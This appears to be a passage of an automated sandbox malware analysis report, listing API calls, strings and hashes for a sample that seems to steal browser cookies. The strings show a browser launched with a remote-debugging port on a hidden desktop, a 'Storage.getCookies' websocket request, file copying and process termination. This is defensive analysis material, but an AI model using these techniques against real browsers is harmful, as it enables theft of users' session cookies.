                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                              • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 3860919712-2388001722
                              • Opcode ID: be3ada4fcabf77c918b3d994701c124b83513dd5251db1db47683e70c7f66324
                              • Instruction ID: d8126f93f2560ee888f60b6d00b5e67c5270ecb5afc8ef1183667993d62f3049
                              • Opcode Fuzzy Hash: be3ada4fcabf77c918b3d994701c124b83513dd5251db1db47683e70c7f66324
                              • Instruction Fuzzy Hash: 43C162729102599FDB61DFA4DC89FEE7779AF48300F04459CF90AA7281DA34AE85CF90
                              APIs
                              • memset.MSVCRT ref: 007B9790
                              • lstrcat.KERNEL32(?,?), ref: 007B97A0
                              • lstrcat.KERNEL32(?,?), ref: 007B97B1
                              • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 007B97C3
                              • memset.MSVCRT ref: 007B97D7
                                • Part of subcall function 007D3E70: lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007D3EA5
                                • Part of subcall function 007D3E70: lstrcpy.KERNEL32(00000000,0145A100), ref: 007D3ECF
                                • Part of subcall function 007D3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,007B134E,?,0000001A), ref: 007D3ED9
                              • wsprintfA.USER32 ref: 007B9806
                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 007B9827
                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 007B9844
                                • Part of subcall function 007D46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007D46B9
                                • Part of subcall function 007D46A0: Process32First.KERNEL32(00000000,00000128), ref: 007D46C9
                                • Part of subcall function 007D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 007D46DB
                                • Part of subcall function 007D46A0: StrCmpCA.SHLWAPI(?,?), ref: 007D46ED
                                • Part of subcall function 007D46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D4702
                                • Part of subcall function 007D46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 007D4711
                                • Part of subcall function 007D46A0: CloseHandle.KERNEL32(00000000), ref: 007D4718
                                • Part of subcall function 007D46A0: Process32Next.KERNEL32(00000000,00000128), ref: 007D4726
                                • Part of subcall function 007D46A0: CloseHandle.KERNEL32(00000000), ref: 007D4731
                              • memset.MSVCRT ref: 007B9862
                              • lstrcat.KERNEL32(00000000,?), ref: 007B9878
                              • lstrcat.KERNEL32(00000000,?), ref: 007B9889
                              • lstrcat.KERNEL32(00000000,007E4B60), ref: 007B989B
                              • memset.MSVCRT ref: 007B98AF
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007B98D4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B9903
                              • StrStrA.SHLWAPI(00000000,0145DCF0), ref: 007B9919
                              • lstrcpyn.KERNEL32(009E93D0,00000000,00000000), ref: 007B9938
                              • lstrlen.KERNEL32(?), ref: 007B994B
                              • wsprintfA.USER32 ref: 007B995B
                              • lstrcpy.KERNEL32(?,00000000), ref: 007B9971
                              • memset.MSVCRT ref: 007B9986
                              • Sleep.KERNEL32(00001388), ref: 007B99E7
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                                • Part of subcall function 007B92B0: strlen.MSVCRT ref: 007B92E1
                                • Part of subcall function 007B92B0: strlen.MSVCRT ref: 007B92FA
                                • Part of subcall function 007B92B0: strlen.MSVCRT ref: 007B9399
                                • Part of subcall function 007B92B0: strlen.MSVCRT ref: 007B93E6
                                • Part of subcall function 007D4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 007D4759
                                • Part of subcall function 007D4740: Process32First.KERNEL32(00000000,00000128), ref: 007D4769
                                • Part of subcall function 007D4740: Process32Next.KERNEL32(00000000,00000128), ref: 007D477B
                                • Part of subcall function 007D4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D479C
                                • Part of subcall function 007D4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 007D47AB
                                • Part of subcall function 007D4740: CloseHandle.KERNEL32(00000000), ref: 007D47B2
                                • Part of subcall function 007D4740: Process32Next.KERNEL32(00000000,00000128), ref: 007D47C0
                                • Part of subcall function 007D4740: CloseHandle.KERNEL32(00000000), ref: 007D47CB
                              • CloseDesktop.USER32(?), ref: 007B9A1C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                              • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                              • API String ID: 2040986984-1862457068
                              • Opcode ID: 34c3bdf226e8efe75253659c60133b6d4e4c82f8ba2869bf43939d19de0b4f38
                              • Instruction ID: c9b8c2b7b8e4dbb9a4cb1c38b6b6b0e9d8a39ba4e1ac16e70127f5450dd477c4
                              • Opcode Fuzzy Hash: 34c3bdf226e8efe75253659c60133b6d4e4c82f8ba2869bf43939d19de0b4f38
                              • Instruction Fuzzy Hash: D9917571914248EFDB50DFA4DC89FDE77B8AF48700F508595F609AB281DB74AE44CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C1291
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C12B4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C12BF
                              • lstrlen.KERNEL32(007E4CA8), ref: 007C12CA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C12E7
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007C12F3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C131E
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C133A
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007C135C
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007C1376
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C13AF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C13D7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C13E2
                              • lstrlen.KERNEL32(007E1794), ref: 007C13ED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C140A
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C1416
                              • lstrlen.KERNEL32(?), ref: 007C1423
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1443
                              • lstrcat.KERNEL32(00000000,?), ref: 007C1451
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C147A
                              • StrCmpCA.SHLWAPI(?,0145CFE0), ref: 007C14A3
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C14E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C150D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C1535
                              • StrCmpCA.SHLWAPI(?,0145D0E0), ref: 007C1552
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1593
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C15BC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C15E4
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C1796
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C17BE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C17F5
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007C181C
                              • FindClose.KERNEL32(00000000), ref: 007C182B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: 19da8708bf9c45260d1409405ac2c37c16ae18c75749a6f43d8b124efa5bed20
                              • Instruction ID: bbeb6a7204c6ff81230fa426b8deec037a5607b838ebf69e0b0679af6ab20584
                              • Opcode Fuzzy Hash: 19da8708bf9c45260d1409405ac2c37c16ae18c75749a6f43d8b124efa5bed20
                              • Instruction Fuzzy Hash: FAC17E71A152469BDB21EF74DC89BEE77B8AF45300F84453CF84AA7252DB38DD068B90
                              APIs
                              • wsprintfA.USER32 ref: 007CE22C
                              • FindFirstFileA.KERNEL32(?,?), ref: 007CE243
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007CE263
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007CE27D
                              • wsprintfA.USER32 ref: 007CE2A2
                              • StrCmpCA.SHLWAPI(?,007DCFEC), ref: 007CE2B4
                              • wsprintfA.USER32 ref: 007CE2D1
                                • Part of subcall function 007CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 007CEE12
                              • wsprintfA.USER32 ref: 007CE2F0
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 007CE304
                              • lstrcat.KERNEL32(?,0145E2F0), ref: 007CE335
                              • lstrcat.KERNEL32(?,007E1794), ref: 007CE347
                              • lstrcat.KERNEL32(?,?), ref: 007CE358
                              • lstrcat.KERNEL32(?,007E1794), ref: 007CE36A
                              • lstrcat.KERNEL32(?,?), ref: 007CE37E
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 007CE394
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE3D2
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE422
                              • DeleteFileA.KERNEL32(?), ref: 007CE45C
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007CE49B
                              • FindClose.KERNEL32(00000000), ref: 007CE4AA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                              • String ID: %s\%s$%s\*
                              • API String ID: 1375681507-2848263008
                              • Opcode ID: 4f2bb0cc26bfbb8363a4ab2859a39dc6c225ee664d9025f700fc9e7bdf32af5f
                              • Instruction ID: deecbae9b1af991dfecbff67efa8daa5bd21063df6bf624cee927a491a381ef6
                              • Opcode Fuzzy Hash: 4f2bb0cc26bfbb8363a4ab2859a39dc6c225ee664d9025f700fc9e7bdf32af5f
                              • Instruction Fuzzy Hash: 998162719142589BCB24EFA4DC89FEF7779BF48300F448998B90AA7141DB38AE45CF90
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B16E2
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B176C
                              • lstrcat.KERNEL32(00000000), ref: 007B1776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B17A2
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B18F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B18FE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$lstrcat
                              • String ID: \*.*
                              • API String ID: 2276651480-1173974218
                              • Opcode ID: c7170575964703248c791860b16cc70c790e09f754d9f39566077d97c4a9e185
                              • Instruction ID: 60e0b65484cf2a4f51112bce2c518468acb9397e96b1d7ad677c4d0de614f2b7
                              • Opcode Fuzzy Hash: c7170575964703248c791860b16cc70c790e09f754d9f39566077d97c4a9e185
                              • Instruction Fuzzy Hash: E4816431916296DBCB21EF68D899BEE77B5AF44701F844124F805BB252DB38AD02CB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007CDD45
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007CDD4C
                              • wsprintfA.USER32 ref: 007CDD62
                              • FindFirstFileA.KERNEL32(?,?), ref: 007CDD79
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007CDD9C
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007CDDB6
                              • wsprintfA.USER32 ref: 007CDDD4
                              • DeleteFileA.KERNEL32(?), ref: 007CDE20
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 007CDDED
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1557
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B1579
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B159B
                                • Part of subcall function 007B1530: lstrcpy.KERNEL32(00000000,?), ref: 007B15FF
                                • Part of subcall function 007CD980: memset.MSVCRT ref: 007CD9A1
                                • Part of subcall function 007CD980: memset.MSVCRT ref: 007CD9B3
                                • Part of subcall function 007CD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CD9DB
                                • Part of subcall function 007CD980: lstrcpy.KERNEL32(00000000,?), ref: 007CDA0E
                                • Part of subcall function 007CD980: lstrcat.KERNEL32(?,00000000), ref: 007CDA1C
                                • Part of subcall function 007CD980: lstrcat.KERNEL32(?,0145DEB8), ref: 007CDA36
                                • Part of subcall function 007CD980: lstrcat.KERNEL32(?,?), ref: 007CDA4A
                                • Part of subcall function 007CD980: lstrcat.KERNEL32(?,0145CED8), ref: 007CDA5E
                                • Part of subcall function 007CD980: lstrcpy.KERNEL32(00000000,?), ref: 007CDA8E
                                • Part of subcall function 007CD980: GetFileAttributesA.KERNEL32(00000000), ref: 007CDA95
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007CDE2E
                              • FindClose.KERNEL32(00000000), ref: 007CDE3D
                              • lstrcat.KERNEL32(?,0145E2F0), ref: 007CDE66
                              • lstrcat.KERNEL32(?,0145D460), ref: 007CDE7A
                              • lstrlen.KERNEL32(?), ref: 007CDE84
                              • lstrlen.KERNEL32(?), ref: 007CDE92
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CDED2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                              • String ID: %s\%s$%s\*
                              • API String ID: 4184593125-2848263008
                              • Opcode ID: 43437ebab1a3afd92586bea723eb2b16b674ad71398e1792417a8752c1091628
                              • Instruction ID: 2425080a8876ba4d72cbafe6cd725f3c6c58597cb06a9f018c7245c254258882
                              • Opcode Fuzzy Hash: 43437ebab1a3afd92586bea723eb2b16b674ad71398e1792417a8752c1091628
                              • Instruction Fuzzy Hash: 70616671914248EBCB20EFB4DC89BDE7779BF48301F4445A8F909A7251DB38AE45DB90
                              APIs
                              • wsprintfA.USER32 ref: 007CD54D
                              • FindFirstFileA.KERNEL32(?,?), ref: 007CD564
                              • StrCmpCA.SHLWAPI(?,007E17A0), ref: 007CD584
                              • StrCmpCA.SHLWAPI(?,007E17A4), ref: 007CD59E
                              • lstrcat.KERNEL32(?,0145E2F0), ref: 007CD5E3
                              • lstrcat.KERNEL32(?,0145E3A0), ref: 007CD5F7
                              • lstrcat.KERNEL32(?,?), ref: 007CD60B
                              • lstrcat.KERNEL32(?,?), ref: 007CD61C
                              • lstrcat.KERNEL32(?,007E1794), ref: 007CD62E
                              • lstrcat.KERNEL32(?,?), ref: 007CD642
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CD682
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CD6D2
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007CD737
                              • FindClose.KERNEL32(00000000), ref: 007CD746
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 50252434-4073750446
                              • Opcode ID: 4becb0839d97b5dcdb6be27cc6dd2812253e0fa54fe931c1e72ffa846c4b8e66
                              • Instruction ID: 9e1c850966c402ca87d244dd1b4a715f1d2148713c68c9253cb4eaf971fd6ec2
                              • Opcode Fuzzy Hash: 4becb0839d97b5dcdb6be27cc6dd2812253e0fa54fe931c1e72ffa846c4b8e66
                              • Instruction Fuzzy Hash: 4B618671910159DBCB20EFB4DC89BDE77B8EF48301F4084A9E949A7241DB38AE45CF90
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: "V6_$,?x$6xiO$<ZV$=?-$@{O$@{O$WH3I$pv$v:$z3^$-
                              • API String ID: 0-1857782857
                              • Opcode ID: 0f280d82f11f32d44a9c480b6b1e0195ff1d6ba91776f23dc1222a36fdf11dd3
                              • Instruction ID: f4c6d1b4ffb2231f29039fe58b362347b6297fd6e2e417c7d9d110799c70d023
                              • Opcode Fuzzy Hash: 0f280d82f11f32d44a9c480b6b1e0195ff1d6ba91776f23dc1222a36fdf11dd3
                              • Instruction Fuzzy Hash: C7B217F360C2049FE7046E2DEC8567AFBE9EF94720F16492DEAC4C3744EA3558058697
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                              • API String ID: 909987262-758292691
                              • Opcode ID: 0dbfca882645bb78541265db9ae2ddc6cbb38d8e076b56dedb542440d0dcb262
                              • Instruction ID: 56e8272aeb369867e28a44220098e878082ee4cf9d7190a59a558f8b92d2d615
                              • Opcode Fuzzy Hash: 0dbfca882645bb78541265db9ae2ddc6cbb38d8e076b56dedb542440d0dcb262
                              • Instruction Fuzzy Hash: 3CA24871D01269DFDB20DFA8C8807EDBBB6AF48300F1481AAE519A7341DB795E85CF91
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C23D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C23F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C2402
                              • lstrlen.KERNEL32(\*.*), ref: 007C240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 007C2436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C2486
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: f7b7add9dff485f430d001cd1f0139c68f06146691ba53d3295e5148b1fa3223
                              • Instruction ID: 296ba05c17f4f0455e89416ad9d1b14ca0fddc809c6b52cbbf1c726e33983299
                              • Opcode Fuzzy Hash: f7b7add9dff485f430d001cd1f0139c68f06146691ba53d3295e5148b1fa3223
                              • Instruction Fuzzy Hash: 55413031526655CBCB32EF68DD89BDE77B5AF54701F009128BC4ABB253CB389D428B90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: '`{O$:-$CjzY$P^'$\>w{$f{o$psu{$us3$wPo~$>~?$]wJ
                              • API String ID: 0-993713886
                              • Opcode ID: cbe931d34a79558e21c24485a6bc0881d47cdaaf1a7ea1d9994968f6cc0ca9e6
                              • Instruction ID: 8296e22aff6a064c1098a87180956e664c3495dbed5ea5b7e7f27873b5f979cc
                              • Opcode Fuzzy Hash: cbe931d34a79558e21c24485a6bc0881d47cdaaf1a7ea1d9994968f6cc0ca9e6
                              • Instruction Fuzzy Hash: 9DB208F360C2049FE304AE6DDC8567AFBE9EF94720F16893DE6C4D3744EA3558018696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: y^G$""rp$+>-B$F6g$yE$n$yWZ$^hG$h\ $r{$.
                              • API String ID: 0-4134388243
                              • Opcode ID: 586e98466fe42eabbbf4daa15718f5212bb2dc5008293bd51449b0ed30083848
                              • Instruction ID: f384f505df2c586c2a8f3e89e92c950789d4b26707ba79f74370bd4e5a32c7f0
                              • Opcode Fuzzy Hash: 586e98466fe42eabbbf4daa15718f5212bb2dc5008293bd51449b0ed30083848
                              • Instruction Fuzzy Hash: 9DB2E7F360C204AFE3046E2DEC85A7AFBE9EF94720F1A453DE6C4C7744E67598018696
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007D46B9
                              • Process32First.KERNEL32(00000000,00000128), ref: 007D46C9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D46DB
                              • StrCmpCA.SHLWAPI(?,?), ref: 007D46ED
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D4702
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 007D4711
                              • CloseHandle.KERNEL32(00000000), ref: 007D4718
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D4726
                              • CloseHandle.KERNEL32(00000000), ref: 007D4731
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: 688c055346690c1b6af613fc1efa96d331a980028181feec077b34c50bb7e005
                              • Instruction ID: 68f07a121ebb8af4b691f3a4ed954357f1f01370283ed0cdf3fe058e46237bbf
                              • Opcode Fuzzy Hash: 688c055346690c1b6af613fc1efa96d331a980028181feec077b34c50bb7e005
                              • Instruction Fuzzy Hash: 5D01A1315251546BE7209B60DCCCFFB377CAB45B12F000099F909A9180EF749D40AAA0
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 007D4628
                              • Process32First.KERNEL32(00000000,00000128), ref: 007D4638
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D464A
                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 007D4660
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D4672
                              • CloseHandle.KERNEL32(00000000), ref: 007D467D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                              • String ID: steam.exe
                              • API String ID: 2284531361-2826358650
                              • Opcode ID: ac2e0ca0b46b70043fd2a8abbe91e93149ccdb066d6a7b5bf863c2b5cfdc3c68
                              • Instruction ID: 2df4fa9a53d78ef87b61485308cfa8710c8cba11cfb4a7b1cdf84b2ded69f55a
                              • Opcode Fuzzy Hash: ac2e0ca0b46b70043fd2a8abbe91e93149ccdb066d6a7b5bf863c2b5cfdc3c68
                              • Instruction Fuzzy Hash: 8F018B71615128ABD720EB60EC88FEA77BCEB09351F0401D6F949E5180EB78CE949AE1
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C4B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C4B7F
                              • lstrlen.KERNEL32(007E4CA8), ref: 007C4B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4BA7
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007C4BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C4BFA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID:
